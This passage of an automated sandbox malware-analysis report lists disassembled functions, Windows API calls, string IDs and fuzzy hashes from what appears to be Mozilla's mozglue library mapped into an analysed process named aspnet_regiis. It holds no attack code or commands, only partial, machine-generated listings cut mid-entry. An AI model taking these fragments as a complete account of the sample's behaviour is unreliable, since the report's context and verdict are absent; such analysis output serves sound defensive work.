                                                                                                                                                                    • __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,Qyl,00000000,?), ref: 6C7F60BA
                                                                                                                                                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C7F60C4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
                                                                                                                                                                    • String ID: Qyl
                                                                                                                                                                    • API String ID: 3835517998-4009424572
                                                                                                                                                                    • Opcode ID: 679e0707ec2fa78dcef8b5be253803e9648ef06b34286c3f9df2cab43800c52d
                                                                                                                                                                    • Instruction ID: 53dfe88f589177023959c3f7606c6c7fc807bf479be474cb1d108fd520238549
                                                                                                                                                                    • Opcode Fuzzy Hash: 679e0707ec2fa78dcef8b5be253803e9648ef06b34286c3f9df2cab43800c52d
                                                                                                                                                                    • Instruction Fuzzy Hash: 6821A3B1A002199FDB205F24DC4DAAA7BF8FF45318F108438E85A97741CB75AA49CFD2
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C79EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C79EB83
                                                                                                                                                                    • ?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C7DB392,?,?,00000001), ref: 6C7D91F4
                                                                                                                                                                      • Part of subcall function 6C7CCBE8: GetCurrentProcess.KERNEL32(?,6C7931A7), ref: 6C7CCBF1
                                                                                                                                                                      • Part of subcall function 6C7CCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7931A7), ref: 6C7CCBFA
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
                                                                                                                                                                    • String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
                                                                                                                                                                    • API String ID: 3790164461-3347204862
                                                                                                                                                                    • Opcode ID: 101a1cdd923d40e0bb818f8bc4ef1c94c67860c8164bfe4cdd0d0b3c2af45fab
                                                                                                                                                                    • Instruction ID: 3d360b7210752a7d3eadde5285749d55867da089339b6c8dba3f8ecad2021078
                                                                                                                                                                    • Opcode Fuzzy Hash: 101a1cdd923d40e0bb818f8bc4ef1c94c67860c8164bfe4cdd0d0b3c2af45fab
                                                                                                                                                                    • Instruction Fuzzy Hash: D0B1F6B1B0120A9BCB14CF94CA5ABEEBBB5BF95318F514529D4016BF80DB31E909CBD1
                                                                                                                                                                    APIs
                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C7BC5A3
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32 ref: 6C7BC9EA
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C7BC9FB
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C7BCA12
                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7BCA2E
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7BCAA5
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharMultiWidestrlen$freemalloc
                                                                                                                                                                    • String ID: (null)$0
                                                                                                                                                                    • API String ID: 4074790623-38302674
                                                                                                                                                                    APIs
                                                                                                                                                                    • islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C7BC784
                                                                                                                                                                    • _dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C7BC801
                                                                                                                                                                    • _dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6C7BC83D
                                                                                                                                                                    • ?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C7BC891
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
                                                                                                                                                                    • String ID: INF$NAN$inf$nan
                                                                                                                                                                    • API String ID: 1991403756-4166689840
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C793284,?,?,6C7B56F6), ref: 6C793492
                                                                                                                                                                    • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C793284,?,?,6C7B56F6), ref: 6C7934A9
                                                                                                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C793284,?,?,6C7B56F6), ref: 6C7934EF
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C79350E
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C793522
                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C793552
                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C793284,?,?,6C7B56F6), ref: 6C79357C
                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C793284,?,?,6C7B56F6), ref: 6C793592
                                                                                                                                                                      • Part of subcall function 6C7CAB89: EnterCriticalSection.KERNEL32(6C81E370,?,?,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284), ref: 6C7CAB94
                                                                                                                                                                      • Part of subcall function 6C7CAB89: LeaveCriticalSection.KERNEL32(6C81E370,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284,?,?,6C7B56F6), ref: 6C7CABD1
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                                                                                                    • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                                                                                    • API String ID: 3634367004-706389432
                                                                                                                                                                    APIs
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: free$moz_xmalloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3009372454-0
                                                                                                                                                                    APIs
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1192971331-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C7A9675
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A9697
                                                                                                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C7A96E8
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C7A9707
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A971F
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C7A9773
                                                                                                                                                                      • Part of subcall function 6C7CAB89: EnterCriticalSection.KERNEL32(6C81E370,?,?,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284), ref: 6C7CAB94
                                                                                                                                                                      • Part of subcall function 6C7CAB89: LeaveCriticalSection.KERNEL32(6C81E370,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284,?,?,6C7B56F6), ref: 6C7CABD1
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C7A97B7
                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C7A97D0
                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C7A97EB
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C7A9824
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
                                                                                                                                                                    • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                                    • API String ID: 409848716-3880535382
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81E784), ref: 6C791EC1
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81E784), ref: 6C791EE1
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81E744), ref: 6C791F38
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81E744), ref: 6C791F5C
                                                                                                                                                                    • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C791F83
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81E784), ref: 6C791FC0
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81E784), ref: 6C791FE2
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81E784), ref: 6C791FF6
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C792019
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
                                                                                                                                                                    • String ID: MOZ_CRASH()
                                                                                                                                                                    • API String ID: 2055633661-2608361144
                                                                                                                                                                    • Opcode ID: a5e50e9e27c1e03915e09155dfc3c6a0a1c2bbf7df898bfa2bb7a8365d32f9a5
                                                                                                                                                                    • Instruction ID: 91c8a65df470d5b44ee7e15edf371fe360c5e2ce57a0f41cb257ba299b7634aa
                                                                                                                                                                    • Opcode Fuzzy Hash: a5e50e9e27c1e03915e09155dfc3c6a0a1c2bbf7df898bfa2bb7a8365d32f9a5
                                                                                                                                                                    • Instruction Fuzzy Hash: 3C41A3B1B0521B8FEB209FA8DA8DB6A3AF5EB4A348F040439E91597F41D7719804CBD1
                                                                                                                                                                    APIs
                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7A7EA7
                                                                                                                                                                    • malloc.MOZGLUE(00000001), ref: 6C7A7EB3
                                                                                                                                                                      • Part of subcall function 6C7ACAB0: EnterCriticalSection.KERNEL32(?), ref: 6C7ACB49
                                                                                                                                                                      • Part of subcall function 6C7ACAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C7ACBB6
                                                                                                                                                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C7A7EC4
                                                                                                                                                                    • mozalloc_abort.MOZGLUE(?), ref: 6C7A7F19
                                                                                                                                                                    • malloc.MOZGLUE(?), ref: 6C7A7F36
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C7A7F4D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                     • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
                                                                                                                                                                    • String ID: d
                                                                                                                                                                    • API String ID: 204725295-2564639436
                                                                                                                                                                    • Opcode ID: e3e1f6ff5b196cea1dfcc6692430fd62e9c96408668ec85b9993064d3da83bb7
                                                                                                                                                                    • Instruction ID: 813e90b7c6491e6a3431cb1bf7ae046c3bb32667672016e2e596edca5005d6ba
                                                                                                                                                                    • Opcode Fuzzy Hash: e3e1f6ff5b196cea1dfcc6692430fd62e9c96408668ec85b9993064d3da83bb7
                                                                                                                                                                    • Instruction Fuzzy Hash: D231C461F002499BDB109B68CD095BEB7B8EF96208F059739EC4957612EB31B689C391
                                                                                                                                                                    APIs
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 6C7A3EEE
                                                                                                                                                                    • RtlFreeHeap.NTDLL ref: 6C7A3FDC
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(?,00000000,00000040), ref: 6C7A4006
                                                                                                                                                                    • RtlFreeHeap.NTDLL ref: 6C7A40A1
                                                                                                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C7A3CCC), ref: 6C7A40AF
                                                                                                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C7A3CCC), ref: 6C7A40C2
                                                                                                                                                                    • RtlFreeHeap.NTDLL ref: 6C7A4134
                                                                                                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,?,?,?,?,6C7A3CCC), ref: 6C7A4143
                                                                                                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,?,?,?,?,6C7A3CCC), ref: 6C7A4157
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                     • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Free$Heap$StringUnicode$Allocate
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3680524765-0
                                                                                                                                                                    • Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                                                                                                    • Instruction ID: 1e776c4786d7bec3a09d2326e2341cee1a4d82103bf8e57a08c65455e9928120
                                                                                                                                                                    • Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                                                                                                    • Instruction Fuzzy Hash: 85A182B1A00205CFDB50CF69C98065AB7B5FF48304F2546A9D9099F742D772E846DFA0
                                                                                                                                                                    APIs
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,6C7B3F47,?,?,?,6C7B3F47,6C7B1A70,?), ref: 6C79207F
                                                                                                                                                                    • memset.VCRUNTIME140(?,000000E5,6C7B3F47,?,6C7B3F47,6C7B1A70,?), ref: 6C7920DD
                                                                                                                                                                    • VirtualFree.KERNEL32(00100000,00100000,00004000,?,6C7B3F47,6C7B1A70,?), ref: 6C79211A
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81E744,?,6C7B3F47,6C7B1A70,?), ref: 6C792145
                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6C7B3F47,6C7B1A70,?), ref: 6C7921BA
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81E744,?,6C7B3F47,6C7B1A70,?), ref: 6C7921E0
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81E744,?,6C7B3F47,6C7B1A70,?), ref: 6C792232
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                     • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
                                                                                                                                                                    • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
                                                                                                                                                                    • API String ID: 889484744-884734703
                                                                                                                                                                    • Opcode ID: 7613a0c6b995fdde78b2c16c5f486d07db460d0b8fd6fd3c0ef65742cc6046e7
                                                                                                                                                                    • Instruction ID: ad8e5daf59103e670fc63bc2ab1a58ca3416bd29a5485e7876a08150a99047a8
                                                                                                                                                                    • Opcode Fuzzy Hash: 7613a0c6b995fdde78b2c16c5f486d07db460d0b8fd6fd3c0ef65742cc6046e7
                                                                                                                                                                    • Instruction Fuzzy Hash: 8F61E131F002168FDB14EFA8DA8DB6E77B5AF85358F294639E524A7F94D7309800C791
                                                                                                                                                                    APIs
                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C7E8273), ref: 6C7E9D65
                                                                                                                                                                    • free.MOZGLUE(6C7E8273,?), ref: 6C7E9D7C
                                                                                                                                                                    • free.MOZGLUE(?,?), ref: 6C7E9D92
                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C7E9E0F
                                                                                                                                                                    • free.MOZGLUE(6C7E946B,?,?), ref: 6C7E9E24
                                                                                                                                                                    • free.MOZGLUE(?,?,?), ref: 6C7E9E3A
                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C7E9EC8
                                                                                                                                                                    • free.MOZGLUE(6C7E946B,?,?,?), ref: 6C7E9EDF
                                                                                                                                                                    • free.MOZGLUE(?,?,?,?), ref: 6C7E9EF5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                     • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 956590011-0
                                                                                                                                                                    • Opcode ID: 16d8a759fb3d30c58bb252be392927a4d0961ae94e4520fd79334bcdecf60004
                                                                                                                                                                    • Instruction ID: 65a57885e2bf40bcf5127c0f9e93634c2fd9ecfb58726c1894b816052bc6b298
                                                                                                                                                                    • Opcode Fuzzy Hash: 16d8a759fb3d30c58bb252be392927a4d0961ae94e4520fd79334bcdecf60004
                                                                                                                                                                    • Instruction Fuzzy Hash: 9471B072909B419BC712CF18D64059BF3F9FFA9314B448619E95A5BB01EB30F885CBC1
                                                                                                                                                                    APIs
                                                                                                                                                                    • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C7EDDCF
                                                                                                                                                                      • Part of subcall function 6C7CFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C7CFA4B
                                                                                                                                                                      • Part of subcall function 6C7E90E0: free.MOZGLUE(?,00000000,?,?,6C7EDEDB), ref: 6C7E90FF
                                                                                                                                                                      • Part of subcall function 6C7E90E0: free.MOZGLUE(?,00000000,?,?,6C7EDEDB), ref: 6C7E9108
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7EDE0D
                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C7EDE41
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7EDE5F
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7EDEA3
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7EDEE9
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C7DDEFD,?,6C7A4A68), ref: 6C7EDF32
                                                                                                                                                                      • Part of subcall function 6C7EDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C7EDB86
                                                                                                                                                                      • Part of subcall function 6C7EDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C7EDC0E
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C7DDEFD,?,6C7A4A68), ref: 6C7EDF65
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7EDF80
                                                                                                                                                                      • Part of subcall function 6C7B5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C7B5EDB
                                                                                                                                                                      • Part of subcall function 6C7B5E90: memset.VCRUNTIME140(6C7F7765,000000E5,55CCCCCC), ref: 6C7B5F27
                                                                                                                                                                      • Part of subcall function 6C7B5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C7B5FB2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                     • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 112305417-0
                                                                                                                                                                    • Opcode ID: fb05569388eaffbb3f80310cc3f7cd8f03c607b7fa1084dfa2050c87f2120ef3
                                                                                                                                                                    • Instruction ID: d7a9d308d690662bb5c6fc289e0ffc79a18f5098d11f3b6ace9a55b2095a1597
                                                                                                                                                                    • Opcode Fuzzy Hash: fb05569388eaffbb3f80310cc3f7cd8f03c607b7fa1084dfa2050c87f2120ef3
                                                                                                                                                                    • Instruction Fuzzy Hash: BC51C7736016019BD721CB28DA886AE73BABFE9308F95053CD81A57B01D731F919CBC6
                                                                                                                                                                    APIs
                                                                                                                                                                    • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C7F5C8C,?,6C7CE829), ref: 6C7F5D32
                                                                                                                                                                    • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C7F5C8C,?,6C7CE829), ref: 6C7F5D62
                                                                                                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C7F5C8C,?,6C7CE829), ref: 6C7F5D6D
                                                                                                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C7F5C8C,?,6C7CE829), ref: 6C7F5D84
                                                                                                                                                                    • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C7F5C8C,?,6C7CE829), ref: 6C7F5DA4
                                                                                                                                                                    • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C7F5C8C,?,6C7CE829), ref: 6C7F5DC9
                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 6C7F5DDB
                                                                                                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C7F5C8C,?,6C7CE829), ref: 6C7F5E00
                                                                                                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C7F5C8C,?,6C7CE829), ref: 6C7F5E45
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2325513730-0
                                                                                                                                                                    • Opcode ID: 1f608718859e4ff797bcca2071656c297c93821aa4db79a03c5fa8bc1161ce2b
                                                                                                                                                                    • Instruction ID: d60cddcca65b78fc476f789b066540c2b63bf210f53e75a632141ce8960edcbd
                                                                                                                                                                    • Opcode Fuzzy Hash: 1f608718859e4ff797bcca2071656c297c93821aa4db79a03c5fa8bc1161ce2b
                                                                                                                                                                    • Instruction Fuzzy Hash: D641AF707002058FCB14DF68D9DDAAE7BF9EF49318F148078E5169B781DB34A806CBA1
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C7931A7), ref: 6C7CCDDD
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
